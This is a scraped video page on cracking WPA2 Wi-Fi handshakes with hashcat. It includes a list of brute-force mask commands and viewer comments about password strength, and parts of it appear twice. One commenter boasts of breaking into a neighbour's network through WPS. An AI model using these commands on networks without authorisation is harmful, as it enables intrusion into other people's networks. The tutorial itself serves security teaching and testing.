Big thanks to Cisco Meraki for sponsoring this video! Learn how to secure hybrid networks so you can stop these kinds of attacks: davidbombal.wiki/meraki Disclaimer: This video is for educational purposes only. I own all equipment used for this demonstration. No actual attack took place on any websites. Only use the tools demonstrated in this video on networks you have permission to attack. // MENU // 00:00 ▶ Intro 02:17 ▶ Real word example 02:58 ▶ Hashcat file format 03:28 ▶ Handshake capture (old mode) 10 digits 03:57 ▶ GPU setup 04:12 ▶ Handshake capture (old mode) 10 digits (cont'd) 06:21 ▶ Handshake capture (new mode) 8 digits 07:57 ▶ Handshake capture (old mode) 8 digits 09:07 ▶ Incrementing digits 11:55 ▶ Built-in charsets 12:22 ▶ Cracking alphanumerical passwords 18:42 ▶ Using wordlists 19:00 ▶ Conclusion // Previous Videos // WiFi WPA/WPA2 vs hashcat and hcxdumptool: th-cam.com/video/Usw0IlGbkC4/w-d-xo.html Kali Wifi Adapters: th-cam.com/video/5MOsY3VNLK8/w-d-xo.html Old method using airmon-ng: th-cam.com/video/WfYxrLaqlN8/w-d-xo.html Old method using GPUs: th-cam.com/video/J8A8rKFZW-M/w-d-xo.html // COMMANDS // Check GPU: hashcat.exe -I 10 digits (Old Method): hashcat.exe -m 2500 -a 3 10digit.hccapx ?d?d?d?d?d?d?d?d?d?d Increment WPA2 digits (Old Method): hashcat.exe -m 2500 -a 3 10digit.hccapx --increment --increment-min 8 --increment-max 20 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d 8 digits (New Method): hashcat.exe -m 22000 8-digit-wpa2.hc22000 -a 3 ?d?d?d?d?d?d?d?d 10 digits (New Method): hashcat.exe -m 22000 10-digit-wpa2.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d 10 digits and alpha (New Method): hashcat.exe -m 22000 10-digit-letters-wpa2.hc22000 -1 ?d?l?u -a 3 ?1?1?1?1?1?1?1?1?1?1 Increment digits (New Method): hashcat.exe -m 22000 hash.hc22000 -a 3 --increment --increment-min 8 --increment-max 18 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d Increment digits and alpha (New Method): hashcat.exe -m 22000 10-digit-letters-wpa2.hc22000 -1 ?d?l?u -a 3 --increment --increment-min 8 --increment-max 12 ?1?1?1?1?1?1?1?1?1?1?1?1 // Previous Videos // WiFi WPA/WPA2 vs hashcat and hcxdumptool: th-cam.com/video/Usw0IlGbkC4/w-d-xo.html Kali Wifi Adapters: th-cam.com/video/5MOsY3VNLK8/w-d-xo.html Old method using airmon-ng: th-cam.com/video/WfYxrLaqlN8/w-d-xo.html Old method using GPUs: th-cam.com/video/J8A8rKFZW-M/w-d-xo.html // SOCIAL // Discord: discord.com/invite/usKSyzb Twitter: twitter.com/davidbombal Instagram: instagram.com/davidbombal LinkedIn: www.linkedin.com/in/davidbombal Facebook: facebook.com/davidbombal.co TikTok: tiktok.com/@davidbombal TH-cam: th-cam.com/users/davidbombal // MY STUFF // Monitor: amzn.to/3yyF74Y More stuff: www.amazon.com/shop/davidbombal // SPONSORS // Interested in sponsoring my videos? Reach out to my team here: sponsors@davidbombal.com Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!
Windows 11 safe mode with networking is not letting me use the internet or connect to wifi. I can not fix my computer without an Internet connection. Please help.
I am following you David from 2+ years. Please also look my comment.A decent fan can expect a single suggestion from your valuable time. My mobile is being spying by someone as usb debugging is turned on automatically after phone restarting automatically
As someone who works in IT for a large enterprise, I think too many tech and security companies focus too heavily on password policies. Specifically ones that are way too complex for the average user. So much that they end up either writing it down on a piece of paper or reuse the same password everywhere. The real threat and issues I’ve faced with many users is social engineering. The focus should be on social engineering and user training. Social engineering is a huge threat to business and home users in the real world. Not exactly on topic but my 2 cents.
That has been my view as well. If my password has held up for the past 90 days, why have me change it to something that may be easier to guess/crack. Looking for anomalous user activity seems like the place to put some focus. If user starts to try to access network shares they have not before (failures) , or outbound packets are out of normal bounds then take action.
Every company should have MFA if they want cyber insurance. We just had a doctor leaving his laptop behind and we were able to just open it from sleep and get right in. I also found his OS was 1903 and seeing the security aspect sucked and updated the system. But where did you run this program and from what device was this able to capture the WiFi from? Did you just need to see the computer zon network and then you jacked up in the computer? You just ran the scan and captured the WiFi code from just running the program without actually on the network?
I agree. I fell a couple times clicking on email mimicking my company IT address. Now I always check the sender email address and even then I don't really click on email not related to my daily tasks or periodically IT routine maintenance
It got me thinking about all those miners out there and hashing. I always imagined someone tricking people into "hashing" with millions of GPUs around the world for nefarious reasons the password cracking power it can have would be immense! Crazy. Great video subbed.
@@davidbombal i'm not kidding, it provides a prospective beyond what i learned in training, to some extent we get old school text in training, nothing can put that in perspective more than a real world example like those you provide
@@davidbombal u shouldnt be. Shows that his country is failing to properly provide the correct education. Meanwhile ur providing the means to kids who in the current generation do nothing but play computers and have the worst behavioral rates. A means to further worsen that behaviour
It's also good practice to change the SSID of home setups as the standard SSID will identify the supplier which can identify the default passwords complexity.
@@mitchellduncklee7182 I think he means more like known character set and character number of the WiFi PSK (pre-shared key/password). An example would be a Spectrum modem/WiFi/router with an SSID of MySpectrum using a default PSK of 8 characters that only consist of uppercase letters and numbers. If you are going to the trouble of changing the PSK, I agree the SSID should be changed as well. That is a really good point about the default password of the router, though changing the SSID will likely not hide anything at this point. After they crack your WiFi PSK and gain access to your network, the next target could be the router but more likely unsecured devices on your network are of more value.
Thank you David , You have a true talent at explaining almost anything in a step by step , methodic process leaving nothing out and explaining the reasoning , that makes learning , what sometimes can start as a complex task so much easier to comprehend . I appreciate the time and knowledge you put into your channel , you are a great teacher . so many of your videos should be shown to every high school student worldwide for security awareness...Thanks Again . great work.
All that really matters is the password length. To brute force, you need to calculate the number of possibilities per individual characters, to the power of the length of the password. For example a 3 digit password using 240 possibilities per character gives 13 million possibilities. But a 4 digit password using only 72 possibilities per character gives 26 million possibilities.
Yeah, multilingual passphrases would be super"funny" to try to brute force. 15000^7 for example. Easy to remember, fast to write, pretty impossible to crack.
Like you mentioned, you might get lucky and get the password cracked in seconds or minutes, even when hashcat says something like > 10 years. The thing that hashcat is calculating there is your hashing rate, and the total number of permutations in the keyspace. The estimate is how long it will take hashcat to burn through the entire keyspace, not the estimated amount of time to find the password.
David your videos are great and to the point, I am glad your are not sipping coffee😂😂😂. I have been in IT since 1967 ( I know it’s a long time) this environment has changed so much. I use to work on troubleshooting shooting the COBOL F compiler for IBM I was able to write in machine language. I use to modify the machine code on the punch cards to screw with the guys code so it would do something else rather what the program was coded for as a joke. I am now taking up ethical hacking to learn how hackers penetrate a network so I could help my clients avoid potential problems. This environment is so complex now but great to work with and I enjoy every minute of it. You add so much value to what I am learning and enhancing my knowledge, thank you very much for your videos.
I just took a class last semester on Ethical Hacking and I’ve learned more watching your videos then I did all semester. I still have so many questions and I wish I had friends that did this stuff so I could learn more
You don't need a lengthy complex password. Just use 3 unrelated words like your dogs name + your favorite food + your favorite song. Then write each other letter big and add 1 or 2 symbols in-between the words. Easy to remember - impossible to brute force, impossible twith dictionary attack too
For simplicity the most important PW I use is a simple sentence of only 6 words in a foreign language with 2 misspellings and and one incomplete word. That's easy to remember as is one other which is just a mathematical formula containing a notation error. About 25 years ago, the Gov't. dropped its case against PGP. I'm told that this occurred as the lawyers were actually walking through the courtroom doors. I asked a mathematician friend about why they would do that. He replied, "Why do you think that decryption can only occur with discovery of the 'key' or that, if discovery were required, that it could only be achieved by brute force." He refused to elaborate and now he's dead (natural causes).
This is the first time I see one of your videos and the very first thing I see after some minutes is that it might be useful for you to switch your camera above your PC. It Feels quite stressful that you look to the site every some seconds. Good video tho ^^ I'm halfway in and I'll probably look until the end
Thanks Dear David Sir for all this effort. We really Enjoy your Pen testing Tutorials. And we've seen a lot in cracking Passwords... How about we go a lil bit deeper into attacking devices. I'm sooo down into putting hands into that case though. By the Way Thanks again For all This lit Stuff... Blessings 🕊❤🤗
Manufacturers should simply add a retry delay, or retry limit. Even a 1 second retry delay is enough to beat brute-force attacks, without users noticing any delay. Even 8 digits gives you an average of 1.5 years minimum.
Retry delay only works if the computer is actively trying to connect with each attempt, my understanding is that those are recorded packets from the router that can be obtained without the target even knowing, and then cracked away from the device to retrieve the password. There are some caveats to this method of cracking though, most of the time pure brute force is terribly inefficient, and the passwords he used were set lengths, only numeric, or started at a relatively low "number" in the brute force list (starting with a 0 as the first character for example) A pure brute force over all possible lengths up to just 12 and alphanumeric will take a pretty long time, not even considering adding special characters
@@cavemanthog Yes you're right. Cracking WPA handshakes is done offline. So here, it's basically defending again handshakes captures, de-auth attack (and even for that, a hacker could just monitor wireless traffic waiting for it). Maybe using certificates to authenticate on the network. But for regular domestic use, you usually don't do that. You can as well put MAC address filtering, but there it's easy to spoof... It can be tedious to manage MAC address everytime you need to connect with a new device, or if the one who administrate home network is not there. But once again, mac address filtering is not really reliable, you can easily analyze the traffic and get the mac address in the wireless frame. So for WPA wireless network security, either use strong password policies or use certificates but then again, it's restricted until authorization.
Specifically, you need to use something like vmware ESXi but that is not something you would normally use at home. He is obviously referring to something like vmware Workstation and/or Hyper-v running on top of Windows. ESXi would be a dedicated machine running vms, not Windows.
@@smudge1619 actually he did not specify a hypervisor. He merely said you cannot get access to a GPU from a VM, which is incorrect. And plenty of people run ESXi at home.
@@TheDainerss I understand, I was filling in your comment with constructive examples/ specifics for people who don't know what would actually work since you did not give examples and just said some hypervisors can.
I love the video and the application. I have a laptop I’m wanting to put hash at on but I seem to be having a problem of getting it to recognize the program. Have you done an installation video? I have windows 10. Keep up the great content.
I was told by a IT guy in the navy that using those tools he could crack all the passwords in a week. He was a geek that lived in California and could drive to work and back only using peoples wifi when he worked as a google network engineer.
Having a complex password is nice and all but not when you want other people to remember it as well who aren't necessarily tech savvy. I think the real problem is that we ask real people to have to input passwords in the first place. We need better forms of authentication that don't require us to have to dumb down passwords so people can remember them. WPS was a good first attempt but it never really evolved in the way that it needed to solve these kinds of problems.
Fun Fact: "Meraki" means "loving what you do" in Greek. In a greek (mis)interpretation, the product's name would mean "Cisco's love on what it's doing"
I agree that WPS should be disabled in a first place, but WSP can be "delayed" - for example 3 incorrect tries locks WPS for 5 min or more. Then, brute force attacks become useless - I meant brute force PixieWPS method
you normaly dont try to bruetforce against the router or whatever. If someone connects to the wifi the hash gets submited cleartext. with your computer you can then read out the hash and start bruteforcing offline
Hi David, I only just came across your channel and I subbed because the ethical hacking you teach is just brilliant! I've learned so much in 48 hours. I'd like to ask, how does one choose a password cracking length that is under the 8 character limit? It states during the attack that you can only have min 8 to max 18. I've looked at the hashcat website guide but cannot seem to locate a command that allows for an attack under 8 characters.
If it's just straigh bruteforce, there's no way for you to get *that* lucky - 40s on an "impossible" crack? Is the time estimate flawed? Or does use something else than just going through all permutations randomly / in order?
This was a great video you put together... I have always has problems with word list . Creating my own so big and small number one. The biggest problem for me is trying to find a good GPU that is not expensive. Because of all the mining going on with BITcoin all the GPU are very expensive. What would be a good GPU to have now a days for cracking these files? Any suggestions let me know or site were I could guy them.
I recall seeing that story out of Israel and it was very interesting. Fortunately (or unfortunately, depending on who you are) in my part of the world (one of the Western European countries), most if not all routers come with a random, alphanumeric, 10+ character default password. For all intents and purposes, this is essentially 'uncrackable' in any reasonable timeframe.
In 2012 I found a buried extension cord from my yard going to my neighbor's house. I unplugged it and while waiting for him to come home to confront him, I decided to attempt to hack his wifi. I pulled a very old Pentium 4 PC out of the closet and installed Kali. As a novice, I had his wifi cracked in a few hours attacking his WPS with aircrack-ng. I had free internet for the next year and do not feel guilty one bit. My electric bill dropped $80 a month and I am certain he stole my power for about the same time I borrowed his internet.
Have you talked about or would you talk about diceware as a password generation scheme? In particular getting significantly longer than 10 characters versus tossing in some special characters and the like…
What I am interested in is how. What is happening in the background. Is each potential password being hashed, and the hash checked against the hash which was scraped from the Wi-Fi network to see if it matches? If so, is this only feasible due to modern GPUs being so powerful? A deep dive into the actual process behind this would be very interesting to me.
I find this intersting moreover because the default password on a sky router was 8 digits made up of upper, lower and numericals however when I tested this.. simple method really I had my password in front of me after about 8 minutes. Long story short, if someone want's into your Wi-Fi bad enough there's no real stopping it unless you manually set your password to 16+ digits and most people overlook this as they are convinced that upper/lower/numerical passwords are so strong and secure, until they see how easy a brute force can be!
David- Thank you! This is such a helpful video. I appreciate all of the content and knowledge your passing along in the cyber security. I did have a question, how do you set up the alfa wifi adapter for WSL2 running on windows 11?
Good luck getting WSL to recognize any USB devices. After some googling, some places say it's possible. Others say it can't. I tried, and have settled on USB devices dont pass through to kali on WSL. Easy solution: Just use a virtual machine like VMware and install kali on it for network hacking. Use WSL2 Kali for everything else.. which ultimately means having 2 kali machines, which then out of laziness defaults to just using the virtual machine Kali and never touching WSL again. TLDR: Ditch WSL and stick to a VM to keep it simple.
To my knowledge, MAC addresses are essentially hashed to IP addresses, so someone with the same IP address as a prohibited MAC address could possibly exploit this. A better way of handling this may be through using data analytics to determine whether a connection involves normal Internet traffic or has malicious intent or something like CloudFlare’s DDoS protection.
Hello, I have a question. Since even more complex passwords can be cracked, then is worth to add MAC filtering on router to secure yourself in this way?
Big thanks to Cisco Meraki for sponsoring this video! Learn how to secure hybrid networks so you can stop these kinds of attacks: davidbombal.wiki/meraki
Disclaimer: This video is for educational purposes only. I own all equipment used for this demonstration. No actual attack took place on any websites. Only use the tools demonstrated in this video on networks you have permission to attack.
// MENU //
00:00 ▶ Intro
02:17 ▶ Real word example
02:58 ▶ Hashcat file format
03:28 ▶ Handshake capture (old mode) 10 digits
03:57 ▶ GPU setup
04:12 ▶ Handshake capture (old mode) 10 digits (cont'd)
06:21 ▶ Handshake capture (new mode) 8 digits
07:57 ▶ Handshake capture (old mode) 8 digits
09:07 ▶ Incrementing digits
11:55 ▶ Built-in charsets
12:22 ▶ Cracking alphanumerical passwords
18:42 ▶ Using wordlists
19:00 ▶ Conclusion
// Previous Videos //
WiFi WPA/WPA2 vs hashcat and hcxdumptool: th-cam.com/video/Usw0IlGbkC4/w-d-xo.html
Kali Wifi Adapters: th-cam.com/video/5MOsY3VNLK8/w-d-xo.html
Old method using airmon-ng: th-cam.com/video/WfYxrLaqlN8/w-d-xo.html
Old method using GPUs: th-cam.com/video/J8A8rKFZW-M/w-d-xo.html
// COMMANDS //
Check GPU:
hashcat.exe -I
10 digits (Old Method):
hashcat.exe -m 2500 -a 3 10digit.hccapx ?d?d?d?d?d?d?d?d?d?d
Increment WPA2 digits (Old Method):
hashcat.exe -m 2500 -a 3 10digit.hccapx --increment --increment-min 8 --increment-max 20 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d
8 digits (New Method):
hashcat.exe -m 22000 8-digit-wpa2.hc22000 -a 3 ?d?d?d?d?d?d?d?d
10 digits (New Method):
hashcat.exe -m 22000 10-digit-wpa2.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d
10 digits and alpha (New Method):
hashcat.exe -m 22000 10-digit-letters-wpa2.hc22000 -1 ?d?l?u -a 3 ?1?1?1?1?1?1?1?1?1?1
Increment digits (New Method):
hashcat.exe -m 22000 hash.hc22000 -a 3 --increment --increment-min 8 --increment-max 18 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d
Increment digits and alpha (New Method):
hashcat.exe -m 22000 10-digit-letters-wpa2.hc22000 -1 ?d?l?u -a 3 --increment --increment-min 8 --increment-max 12 ?1?1?1?1?1?1?1?1?1?1?1?1
// Previous Videos //
WiFi WPA/WPA2 vs hashcat and hcxdumptool: th-cam.com/video/Usw0IlGbkC4/w-d-xo.html
Kali Wifi Adapters: th-cam.com/video/5MOsY3VNLK8/w-d-xo.html
Old method using airmon-ng: th-cam.com/video/WfYxrLaqlN8/w-d-xo.html
Old method using GPUs: th-cam.com/video/J8A8rKFZW-M/w-d-xo.html
// SOCIAL //
Discord: discord.com/invite/usKSyzb
Twitter: twitter.com/davidbombal
Instagram: instagram.com/davidbombal
LinkedIn: www.linkedin.com/in/davidbombal
Facebook: facebook.com/davidbombal.co
TikTok: tiktok.com/@davidbombal
TH-cam: th-cam.com/users/davidbombal
// MY STUFF //
Monitor: amzn.to/3yyF74Y
More stuff: www.amazon.com/shop/davidbombal
// SPONSORS //
Interested in sponsoring my videos? Reach out to my team here: sponsors@davidbombal.com
Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!
Always love your videos david, keep it up!
Windows 11 safe mode with networking is not letting me use the internet or connect to wifi. I can not fix my computer without an Internet connection. Please help.
How does kali Linux fit in here? I waited the whole video for the Kali part but this was all done in windows.
I am following you David from 2+ years. Please also look my comment.A decent fan can expect a single suggestion from your valuable time. My mobile is being spying by someone as usb debugging is turned on automatically after phone restarting automatically
Thanck ✌️
As someone who works in IT for a large enterprise, I think too many tech and security companies focus too heavily on password policies. Specifically ones that are way too complex for the average user. So much that they end up either writing it down on a piece of paper or reuse the same password everywhere. The real threat and issues I’ve faced with many users is social engineering.
The focus should be on social engineering and user training.
Social engineering is a huge threat to business and home users in the real world.
Not exactly on topic but my 2 cents.
exactly!
That has been my view as well. If my password has held up for the past 90 days, why have me change it to something that may be easier to guess/crack. Looking for anomalous user activity seems like the place to put some focus. If user starts to try to access network shares they have not before (failures) , or outbound packets are out of normal bounds then take action.
also mfa.. every company should have mfa as standard
Every company should have MFA if they want cyber insurance. We just had a doctor leaving his laptop behind and we were able to just open it from sleep and get right in. I also found his OS was 1903 and seeing the security aspect sucked and updated the system.
But where did you run this program and from what device was this able to capture the WiFi from?
Did you just need to see the computer zon network and then you jacked up in the computer?
You just ran the scan and captured the WiFi code from just running the program without actually on the network?
I agree. I fell a couple times clicking on email mimicking my company IT address. Now I always check the sender email address and even then I don't really click on email not related to my daily tasks or periodically IT routine maintenance
It got me thinking about all those miners out there and hashing. I always imagined someone tricking people into "hashing" with millions of GPUs around the world for nefarious reasons the password cracking power it can have would be immense! Crazy. Great video subbed.
i've learn more from this show than have from years of ongoing technical certification, thank you
Very happy to hear that!
@@davidbombal i'm not kidding, it provides a prospective beyond what i learned in training, to some extent we get old school text in training, nothing can put that in perspective more than a real world example like those you provide
Same here
@@davidbombal u shouldnt be. Shows that his country is failing to properly provide the correct education. Meanwhile ur providing the means to kids who in the current generation do nothing but play computers and have the worst behavioral rates. A means to further worsen that behaviour
@@TheRukaslover cope
It's also good practice to change the SSID of home setups as the standard SSID will identify the supplier which can identify the default passwords complexity.
You mean "admin-admin" or "admin-password" (common default user-passwords)
@@mitchellduncklee7182 I think he means more like known character set and character number of the WiFi PSK (pre-shared key/password). An example would be a Spectrum modem/WiFi/router with an SSID of MySpectrum using a default PSK of 8 characters that only consist of uppercase letters and numbers.
If you are going to the trouble of changing the PSK, I agree the SSID should be changed as well.
That is a really good point about the default password of the router, though changing the SSID will likely not hide anything at this point. After they crack your WiFi PSK and gain access to your network, the next target could be the router but more likely unsecured devices on your network are of more value.
in all fairness, any wifi scanner worth its salt than can show MAC addresses regardless of SSID, will usually show the firmware vendor either way ;)
@@klontjespap Depends on who reserved the OUI but fair enough.
I guess you can slow someone down, or confuse them that way. Like, use a SSID pattern of some other familiar device manufacturer.
I really admire your commitment to creating these videos , thanks a lot David .
Thank you David , You have a true talent at explaining almost anything in a step by step , methodic process leaving nothing out and explaining the reasoning , that makes learning , what sometimes can start as a complex task so much easier to comprehend . I appreciate the time and knowledge you put into your channel , you are a great teacher . so many of your videos should be shown to every high school student worldwide for security awareness...Thanks Again . great work.
Perfect way to end the night another bombal upload!! Thanks for the awesome content and tutorials as always!!
Thank you! Glad you are enjoying the videos :)
All that really matters is the password length.
To brute force, you need to calculate the number of possibilities per individual characters, to the power of the length of the password.
For example a 3 digit password using 240 possibilities per character gives 13 million possibilities.
But a 4 digit password using only 72 possibilities per character gives 26 million possibilities.
Yeah, multilingual passphrases would be super"funny" to try to brute force. 15000^7 for example. Easy to remember, fast to write, pretty impossible to crack.
what about handshake method? Am I safe if I use 60 characters lenght password key?
is it me or does he have a new monitor in every video. Love the stuff David produces, learning so much.
Is that a Samsung? Looks even wider.
The problem is balancing security and convenience. Nobody wants a 12-14 digit WiFi password with random characters and numbers
There must be a way to lock the Wi-Fi router down for a few minutes after 3 failed attempts.
It doesnt need to be random, 14 digits will be enough
It's not hard to make a 25 char pass with symbol and caps n numbers that is simply a sentence/word for you lazy ppl is how hackers get in
@@Mehwhatevr Huh? He wasn't constantly trying to log in...he is brute forcing the hashed handshake.
I use a password with 20 random characters and numbers. And for the guest I have a QR code on the door
Like you mentioned, you might get lucky and get the password cracked in seconds or minutes, even when hashcat says something like > 10 years. The thing that hashcat is calculating there is your hashing rate, and the total number of permutations in the keyspace. The estimate is how long it will take hashcat to burn through the entire keyspace, not the estimated amount of time to find the password.
Well put
David your videos are great and to the point, I am glad your are not sipping coffee😂😂😂. I have been in IT since 1967 ( I know it’s a long time) this environment has changed so much. I use to work on troubleshooting shooting the COBOL F compiler for IBM I was able to write in machine language. I use to modify the machine code on the punch cards to screw with the guys code so it would do something else rather what the program was coded for as a joke. I am now taking up ethical hacking to learn how hackers penetrate a network so I could help my clients avoid potential problems. This environment is so complex now but great to work with and I enjoy every minute of it. You add so much value to what I am learning and enhancing my knowledge, thank you very much for your videos.
The cracking speed is amazing!! Would you make a video using Cloud GPU??
This video is so helpful for people like myself trying to get into cyber security.
Thank you very much Mr. Bombal, this is the best video on TH-cam and the entire internets of how to do the real thing.
I just took a class last semester on Ethical Hacking and I’ve learned more watching your videos then I did all semester. I still have so many questions and I wish I had friends that did this stuff so I could learn more
Thank you David. I'm a total noob to this stuff and your videos are really exciting/motivating me to learn.
Thanks!
Very good information and instruction, appreciate the content 🙏🏼 cheers mate.
always love Davids Channel. very very Informative and interesting.
That #ad was so smoothly squeezed in there I barely understood what was going on when it started :'D bro... Well done!
You don't need a lengthy complex password. Just use 3 unrelated words like your dogs name + your favorite food + your favorite song. Then write each other letter big and add 1 or 2 symbols in-between the words. Easy to remember - impossible to brute force, impossible twith dictionary attack too
For simplicity the most important PW I use is a simple sentence of only 6 words in a foreign language with 2 misspellings and and one incomplete word. That's easy to remember as is one other which is just a mathematical formula containing a notation error. About 25 years ago, the Gov't. dropped its case against PGP. I'm told that this occurred as the lawyers were actually walking through the courtroom doors. I asked a mathematician friend about why they would do that. He replied, "Why do you think that decryption can only occur with discovery of the 'key' or that, if discovery were required, that it could only be achieved by brute force." He refused to elaborate and now he's dead (natural causes).
Great tutorials David! Keep them coming!
Great video David! Thank you so much.
Thank boss. I need more of this. Buying an offensive security pack is expensive. Your video helps a lot.
This is the first time I see one of your videos and the very first thing I see after some minutes is that it might be useful for you to switch your camera above your PC. It Feels quite stressful that you look to the site every some seconds.
Good video tho ^^ I'm halfway in and I'll probably look until the end
Thanks Dear David Sir for all this effort. We really Enjoy your Pen testing Tutorials. And we've seen a lot in cracking Passwords... How about we go a lil bit deeper into attacking devices. I'm sooo down into putting hands into that case though. By the Way Thanks again For all This lit Stuff... Blessings 🕊❤🤗
Great suggestion!
its always a delite to see your content... always gets me pumped up...!! keep on rocking!! love your videos
Manufacturers should simply add a retry delay, or retry limit.
Even a 1 second retry delay is enough to beat brute-force attacks, without users noticing any delay. Even 8 digits gives you an average of 1.5 years minimum.
Retry delay only works if the computer is actively trying to connect with each attempt, my understanding is that those are recorded packets from the router that can be obtained without the target even knowing, and then cracked away from the device to retrieve the password.
There are some caveats to this method of cracking though, most of the time pure brute force is terribly inefficient, and the passwords he used were set lengths, only numeric, or started at a relatively low "number" in the brute force list (starting with a 0 as the first character for example)
A pure brute force over all possible lengths up to just 12 and alphanumeric will take a pretty long time, not even considering adding special characters
@@cavemanthog and then he will say that we use easy passwords to decrease time required for demonstration.
@@cavemanthog Yes you're right. Cracking WPA handshakes is done offline. So here, it's basically defending again handshakes captures, de-auth attack (and even for that, a hacker could just monitor wireless traffic waiting for it). Maybe using certificates to authenticate on the network. But for regular domestic use, you usually don't do that. You can as well put MAC address filtering, but there it's easy to spoof... It can be tedious to manage MAC address everytime you need to connect with a new device, or if the one who administrate home network is not there. But once again, mac address filtering is not really reliable, you can easily analyze the traffic and get the mac address in the wireless frame. So for WPA wireless network security, either use strong password policies or use certificates but then again, it's restricted until authorization.
that's not how this works. you already have the encrypted password (the hash) and then you are trying to decrypt the password which takes time.
I’m still a Linux newbie on Manjaro and I’m just starting to learn code. However, I found this totally fascinating.
you are the most honest person i have seen thank you bombal keep going
Thank you, I appreciate that 😀
As always thank you for knowledge you impart on us
Just found ur channel. Very informative. New sub!
Thank you for clearing up some questions I had with hashcat. One question though, does running hashcat on a gpu harsh on the hardware?
If laptop then yes its harsh, if pc then depends on the cooling.
it can also be run over cpu instead of gpu. I believe when ran on kali its cpu by default because linux dosnt like graphics cards
@@jesseclutterbuck6617 :D
4:21 This is incorrect, you can 100% gain direct access to a GPU from a vrtual machine depending on the hypervisor you use.
Specifically, you need to use something like vmware ESXi but that is not something you would normally use at home. He is obviously referring to something like vmware Workstation and/or Hyper-v running on top of Windows. ESXi would be a dedicated machine running vms, not Windows.
@@smudge1619 actually he did not specify a hypervisor. He merely said you cannot get access to a GPU from a VM, which is incorrect. And plenty of people run ESXi at home.
@@TheDainerss I understand, I was filling in your comment with constructive examples/ specifics for people who don't know what would actually work since you did not give examples and just said some hypervisors can.
Nice video and very informative..will sure try this.
Hello, nice video first time watching you. If you recorded very often you screen why not use a capture device and don't stress out your GPU?
Thanks Mr. Bombal your videos everything is bum 💥
Idk why and idk how I am getting recommended these videos, but ye thank God bro
Just a comment to support the channel. Love the content.
Best and clear explanation , thank you.
Hello David, GREAT video. I do have one question. Is there a way to modify the optimizers being used on hashcat?? greetings!!
I love the video and the application. I have a laptop I’m wanting to put hash at on but I seem to be having a problem of getting it to recognize the program. Have you done an installation video? I have windows 10. Keep up the great content.
_Just found your site, __-better-__ much better than "other's" out there, think I'll take a quick look over your previous ones. Thanks for work_ 👍🏻
David with his super computer cracks passwords in 40 seconds.
Me with my old PC, in 40 days :p
Love seeing RGB GPUs. Great Content as always 💥
The best chanle about computers ever
@upwardhacks what?
I was told by a IT guy in the navy that using those tools he could crack all the passwords in a week. He was a geek that lived in California and could drive to work and back only using peoples wifi when he worked as a google network engineer.
yea good idea put all your data on other peoples routers! why didnt I think of that!
Having a complex password is nice and all but not when you want other people to remember it as well who aren't necessarily tech savvy. I think the real problem is that we ask real people to have to input passwords in the first place. We need better forms of authentication that don't require us to have to dumb down passwords so people can remember them. WPS was a good first attempt but it never really evolved in the way that it needed to solve these kinds of problems.
Fun Fact: "Meraki" means "loving what you do" in Greek. In a greek (mis)interpretation, the product's name would mean "Cisco's love on what it's doing"
Thanks and appreciation to the professor David
You're welcome!
I agree that WPS should be disabled in a first place, but WSP can be "delayed" - for example 3 incorrect tries locks WPS for 5 min or more. Then, brute force attacks become useless - I meant brute force PixieWPS method
you normaly dont try to bruetforce against the router or whatever. If someone connects to the wifi the hash gets submited cleartext. with your computer you can then read out the hash and start bruteforcing offline
Sir, you are DOPE ! Instant sub !
Thank you!
Okay, my tech detox is over.
Starting to learn from Mr. DB again 😜💯✌️
hey how can i get the 10 letter digits file thing
Hi David, I only just came across your channel and I subbed because the ethical hacking you teach is just brilliant! I've learned so much in 48 hours.
I'd like to ask, how does one choose a password cracking length that is under the 8 character limit?
It states during the attack that you can only have min 8 to max 18.
I've looked at the hashcat website guide but cannot seem to locate a command that allows for an attack under 8 characters.
that's why having a low range router is a good idea. signal just not strong enough to go out of your house or a few walls
I miss the old WPS attack. Those were the days.
Sir your editing is so professional
thanks for the video its awesome. i wanna learn to programm which language is the best to learn?
If it's just straigh bruteforce, there's no way for you to get *that* lucky - 40s on an "impossible" crack? Is the time estimate flawed? Or does use something else than just going through all permutations randomly / in order?
Can this be done also with integrated Wi-Fi card instead of external adapter?
I'm surprised I haven't seen you do a video on airegeddon
Thnks, would love an explanation from you on hashcat rules and hybrid wordlists.
Loved it. Thank you !
awesome content. Keep up the great work
3:15, which video from the description is the one that describes how to capture this information please?
Here you go: th-cam.com/video/Usw0IlGbkC4/w-d-xo.html
@@davidbombal Thank you, I'm an idiot. Also, do you have SA heritage? I swear that accent sounds super local!
This was a great video you put together... I have always has problems with word list . Creating my own so big and small number one. The biggest problem for me is trying to find a good GPU that is not expensive. Because of all the mining going on with BITcoin all the GPU are very expensive. What would be a good GPU to have now a days for cracking these files?
Any suggestions let me know or site were I could guy them.
Buy high end gaming laptop
Where do you get the file from? Also nice vid.
I recall seeing that story out of Israel and it was very interesting.
Fortunately (or unfortunately, depending on who you are) in my part of the world (one of the Western European countries), most if not all routers come with a random, alphanumeric, 10+ character default password. For all intents and purposes, this is essentially 'uncrackable' in any reasonable timeframe.
and then 20% of the people change them to their telephone number or something easy to remember, IF they have the skills
In 2012 I found a buried extension cord from my yard going to my neighbor's house. I unplugged it and while waiting for him to come home to confront him, I decided to attempt to hack his wifi. I pulled a very old Pentium 4 PC out of the closet and installed Kali. As a novice, I had his wifi cracked in a few hours attacking his WPS with aircrack-ng. I had free internet for the next year and do not feel guilty one bit. My electric bill dropped $80 a month and I am certain he stole my power for about the same time I borrowed his internet.
Great video… extremely thorough!!!
I'd love to see a link to the referenced article in the video description
Really interesting information.
Thx for sharing it with us.
(Will change to WPA3 and make a longer password)
Have you talked about or would you talk about diceware as a password generation scheme? In particular getting significantly longer than 10 characters versus tossing in some special characters and the like…
Sir, what do you mean "Be careful WPS you probably gonna wanna disable that", is that the WPS office tool?
I saw my neighbor's phone on my wifi one day, now i use a whitelist of mac adresses. Rekt.
What I am interested in is how.
What is happening in the background.
Is each potential password being hashed, and the hash checked against the hash which was scraped from the Wi-Fi network to see if it matches?
If so, is this only feasible due to modern GPUs being so powerful?
A deep dive into the actual process behind this would be very interesting to me.
